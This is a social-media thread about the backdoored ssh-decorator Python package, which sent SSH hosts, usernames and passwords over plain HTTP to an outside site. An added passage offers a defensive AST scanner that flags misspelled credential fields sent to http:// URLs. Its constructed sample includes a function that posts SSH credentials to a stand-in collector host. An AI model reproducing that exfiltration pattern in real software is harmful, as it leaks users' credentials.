always coming home @nightpool

holy shit.

"The ssh-decorator package from Python pip had an obvious backdoor"

sends host + username + password to an external website


@nightpool now imagine if it were proprietary.

@SoniEx2 most people don't use proprietary libraries

@nightpool that's not just a backdoor, that's blatant exfiltration. (Over HTTP, which is a crime of its own.)

@alfajet which is completely pointless, given that dot cf never provides any personal details...

@nightpool Chapter four billion, seven hundred thirty-eight thousand, nine hundred twenty-four in why you shouldn't blindly install stuff from a package system anyone can upload to.

@nightpool Or even with your eyes open, since at any time a package could change hands.

@nightpool @codl holy shit IN PLAINTEXT even what the jesus everfucking shit

@fluffy @nightpool @codl And if it weren't bad enough: logging it as 'passowrd'.

@Austin_Dern @nightpool @codl I can actually see them having done that on purpose to fool automated warning/checker things. It’s an anti pattern I saw a few times at Amazon internally to escape a code auditor process.

@fluffy @nightpool @codl Surely it is to sneak past automated checking, yes. It's the laziness that gets me. If they had titled it like 'networkSuccess' or 'connectStatus' or even 'misc1', then you'd have something too boring to pay attention to if you caught it being passed on your network.
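The replies above describe the detection problem exactly: a grep for "password" misses a field spelled "passowrd", and a plain HTTP call on its own is not proof of anything. Below is an added example (not code from this thread or from the ssh-decorator package) of a small AST-based scanner that catches both halves of that pattern: it flags dictionary keys and keyword arguments within a couple of edits of a credential word, flags string literals starting with http:// passed to common request functions, and only marks a function as suspect when both show up in the same scope. The sample source it scans, the collector URL (collector.invalid) and the function names are constructed for the example.

```python
"""Heuristic scanner for credential exfiltration hidden behind a misspelled
field name. Added example, not code from the thread or from ssh-decorator."""
import ast
from typing import Optional

# Field names that usually carry secrets; near-misspellings are matched too.
CREDENTIAL_WORDS = {"password", "passwd", "secret", "token", "apikey",
                    "api_key", "private_key", "credential"}
# Function names commonly used for outbound requests (urllib, requests, ...).
NETWORK_CALLS = {"urlopen", "urlretrieve", "request", "get", "post", "put"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a swap such as passowrd/password costs 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_credential_key(name: str) -> bool:
    """True for a credential word or a name within 2 edits of one.
    Short names (host, port, user) are only matched exactly, to limit noise."""
    name = name.lower().replace("-", "_")
    if name in CREDENTIAL_WORDS:
        return True
    return len(name) >= 6 and any(edit_distance(name, w) <= 2 for w in CREDENTIAL_WORDS)


def _scope_of_nodes(tree: ast.AST) -> dict:
    """Map every node to the name of its nearest enclosing function."""
    owner = {}

    def visit(node, scope):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            scope = node.name
        owner[node] = scope
        for child in ast.iter_child_nodes(node):
            visit(child, scope)

    visit(tree, "<module>")
    return owner


def _string_value(node) -> Optional[str]:
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None


def scan_source(source: str) -> dict:
    """Per function: credential-looking keys, plaintext http:// URLs handed to a
    request function, and a 'suspect' flag set only when both occur together."""
    tree = ast.parse(source)
    owner = _scope_of_nodes(tree)
    report = {}

    def entry(scope):
        return report.setdefault(scope, {"credential_keys": [], "plaintext_urls": [], "suspect": False})

    for node in ast.walk(tree):
        scope = owner[node]
        if isinstance(node, ast.Dict):
            for key in node.keys:
                text = _string_value(key)
                if text is not None and looks_like_credential_key(text):
                    entry(scope)["credential_keys"].append(text)
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            for kw in node.keywords:  # e.g. connect(password=...) also counts as a key
                if kw.arg and looks_like_credential_key(kw.arg):
                    entry(scope)["credential_keys"].append(kw.arg)
            if name in NETWORK_CALLS:
                for arg in list(node.args) + [kw.value for kw in node.keywords]:
                    text = _string_value(arg)
                    if text and text.lower().startswith("http://"):
                        entry(scope)["plaintext_urls"].append(text)

    for info in report.values():
        info["suspect"] = bool(info["credential_keys"] and info["plaintext_urls"])
    return report


# Constructed sample in the shape the thread describes (not the real package):
# a wrapper that also posts the SSH credentials to a hypothetical collector.
SAMPLE = '''
import urllib.parse
import urllib.request

def connect(host, username, password):
    # ... the legitimate SSH work would happen here ...
    payload = urllib.parse.urlencode(
        {"host": host, "user": username, "passowrd": password}).encode()
    urllib.request.urlopen("http://collector.invalid/log", payload)
    return True

def healthcheck():
    # Plain HTTP with no secret nearby: reported, but not marked suspect.
    return urllib.request.urlopen("http://status.invalid/ping").status
'''

if __name__ == "__main__":
    for scope, info in scan_source(SAMPLE).items():
        print(scope, info)
```

The scope-level combination is what keeps this usable: a legitimate SSH wrapper calling `connect(password=...)` produces a credential key but no plaintext URL, and a health check hitting an http:// endpoint produces a URL but no key, so neither is marked suspect. Only the function that has both, like the constructed `connect` above, is. Variables carrying URLs built at runtime and obfuscated strings are not caught; this is a first-pass filter, not a verdict.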

@nightpool which also reminds me that each npm package I install, each shady library I git clone and build is executing arbitrary code in my self-signed-certificate-secure-boot-and-full-disk-encryption-TPM-enabled-machine

paranoid mode (re)activated, I'll probably be installing "CleanMyPC" in like four days or so

@nightpool they could have at least obfuscated it or something

@nightpool It's almost like that practice of basically forcing people to put plaintext passwords in ~/.pypirc and never checking signatures wasn't the best idea :/

@nightpool So Twitter uses a Python backend? 😂